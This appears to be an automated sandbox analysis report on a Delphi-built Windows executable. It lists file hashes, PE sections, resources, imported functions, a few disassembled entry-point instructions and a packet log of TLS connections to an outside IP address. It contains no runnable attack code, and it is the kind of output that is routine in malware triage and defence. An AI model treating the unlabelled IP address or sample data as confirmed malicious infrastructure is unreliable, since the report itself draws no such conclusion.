                                                                            SSDEEP:24576:YgjfgAhthN1aH674weG2Xiou9TBeWyKvBeI+T68sjjX:YUtNCGTBXyKv8vT6r
                                                                            TLSH:FF357D122140143BCB7377F98B86D6D8B42DED1D1618786E6A973B8B0AF7270F8E505E
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                            Icon Hash:6c33333333034c70
                                                                            Entrypoint:0x461490
                                                                            Entrypoint Section:.itext
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:7873f1cee87f668ad79181f1c1cd8f07
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFF0h
                                                                            mov eax, 0045DAACh
                                                                            call 00007F51F8668BC5h
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007F51F86BAC55h
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, 004614F0h
                                                                            call 00007F51F86BA6DCh
                                                                            mov ecx, dword ptr [004CCBE0h]
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, dword ptr [0045D1D4h]
                                                                            call 00007F51F86BAC44h
                                                                            mov eax, dword ptr [004CCCB8h]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007F51F86BACB8h
                                                                            call 00007F51F8666A43h
                                                                            add byte ptr [eax], al
                                                                             Name                                 | Virtual Address | Virtual Size | Is in Section
                                                                             IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xd1000         | 0x2656       | .idata
                                                                             IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xdd000         | 0x33e00      | .rsrc
                                                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xd6000         | 0x6e90       | .reloc
                                                                             IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_TLS            | 0xd5000         | 0x18         | .rdata
                                                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_IAT            | 0xd1738         | 0x5f8        | .idata
                                                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                                                             IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ccfc | 0x5ce00 | ec0b073cb39ded0e2389db541ea26c95 | False | 0.525167185397039 | data | 6.5435496200376555 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5e000 | 0x3508 | 0x3600 | 46619a1a2848b1dee5a102aa4901d57a | False | 0.3472222222222222 | data | 5.513007867449675 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x62000 | 0x6ae58 | 0x6b000 | 2bae7df7f59a3315aaa996408829b936 | False | 0.5081045560747663 | data | 6.500873269343917 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xcd000 | 0x36d0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd1000 | 0x2656 | 0x2800 | eb0b41497509e4cb032aaabec5b8d5c5 | False | 0.31220703125 | data | 5.073460051819435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xd4000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xd5000 | 0x18 | 0x200 | 389cffe8a4e7b2fdb439e2e9d918a025 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd6000 | 0x6e90 | 0x7000 | b338a9383541a38b75a372e3f419e93f | False | 0.6334402901785714 | data | 6.675439498395376 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xdd000 | 0x33e00 | 0x33e00 | 687c4b488cbb2e53b54ede465714b165 | False | 0.1153379141566265 | data | 4.711864521160899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xddc0c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0xddd40 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0xdde74 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0xddfa8 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0xde0dc | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0xde210 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0xde344 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0xde478 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xde648 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0xde82c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xde9fc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0xdebcc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0xded9c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0xdef6c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0xdf13c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xdf30c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0xdf4dc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xdf6ac | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0xdf794 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 32251 x 32251 px/m | | | 0.5203900709219859
RT_ICON | 0xdfbfc | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 32251 x 32251 px/m | | | 0.3831967213114754
RT_ICON | 0xe0584 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 32251 x 32251 px/m | | | 0.28283302063789867
RT_ICON | 0xe162c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 32251 x 32251 px/m | | | 0.1725103734439834
RT_ICON | 0xe3bd4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 32251 x 32251 px/m | | | 0.12086679263108172
RT_ICON | 0xe7dfc | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 32251 x 32251 px/m | | | 0.10378927911275417
RT_ICON | 0xed284 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 32251 x 32251 px/m | | | 0.07567669172932331
RT_ICON | 0xf3a6c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 32251 x 32251 px/m | | | 0.0758618877443767
RT_ICON | 0xfcf14 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 32251 x 32251 px/m | | | 0.05842600260262629
RT_DIALOG | 0x10d73c | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x10d790 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x10d7e4 | 0x238 | data | | | 0.47183098591549294
RT_STRING | 0x10da1c | 0x2b0 | data | | | 0.4752906976744186
RT_STRING | 0x10dccc | 0xb8 | data | | | 0.6793478260869565
RT_STRING | 0x10dd84 | 0xec | data | | | 0.6398305084745762
RT_STRING | 0x10de70 | 0x2f0 | data | | | 0.4587765957446808
RT_STRING | 0x10e160 | 0x3d0 | data | | | 0.38729508196721313
RT_STRING | 0x10e530 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x10e8a0 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x10ec6c | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x10ee80 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x10ef4c | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x10f0e0 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x10f4a4 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x10f7dc | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x10fa70 | 0x10 | data | | | 1.5
RT_RCDATA | 0x10fa80 | 0x2f4 | data | | | 0.7182539682539683
RT_RCDATA | 0x10fd74 | 0xe8a | Delphi compiled form 'TFrmMain' | | | 0.2729715206878023
RT_GROUP_CURSOR | 0x110c00 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x110c14 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x110c28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x110c3c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x110c50 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x110c64 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x110c78 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x110c8c | 0x84 | data | | | 0.75
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumDateFormatsW, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll | GetErrorInfo, GetActiveObject, SysFreeString
ole32.dll | CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Jul 3, 2024 08:56:53.032433033 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.032491922 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.032500029 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.032535076 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.033233881 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.033250093 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.033304930 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.033312082 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.033351898 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.038846970 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.038862944 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.038923025 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.038933992 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.038970947 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.039571047 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.039587021 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.039630890 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.039638996 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.039676905 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.088181973 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.088207960 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.088298082 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.088310957 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.088361025 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.088654995 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.088696957 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.088716984 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.088722944 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.088752985 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.088768959 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.119347095 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.119364977 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.119438887 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.119450092 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.119489908 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.119704008 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.119719028 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.119752884 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.119759083 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.119802952 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.119822979 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.120291948 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.120342970 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.120352983 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.120358944 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.120436907 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.120436907 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.120857954 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.120872974 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.120923996 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.120933056 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.120969057 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.121536016 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.121588945 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.121594906 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.121607065 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.121651888 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.122219086 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.122237921 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.122287989 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.122293949 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.122328997 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.178788900 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.178808928 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.178881884 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.178893089 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.178935051 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.179186106 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.179200888 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.179256916 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.179263115 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.179299116 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.209991932 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.210011005 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.210088968 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.210102081 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.210141897 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.210640907 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.210681915 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.210705042 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.210711002 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.210747004 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.210763931 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.211066961 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.211081982 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.211137056 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.211143017 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.211180925 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.211702108 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.211716890 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.211769104 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.211775064 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.211813927 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.212455034 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.212470055 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.212518930 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.212527037 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.212564945 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.213130951 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.213161945 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.213182926 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.213188887 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.213213921 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.213228941 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.269503117 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.269522905 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.269608974 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.269618988 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.269664049 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.270097017 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.270112991 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.270169020 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.270175934 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.270214081 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.300741911 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.300760984 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.300848961 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.300869942 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.300909996 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.301462889 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.301477909 CEST44349700108.170.55.202192.168.2.7
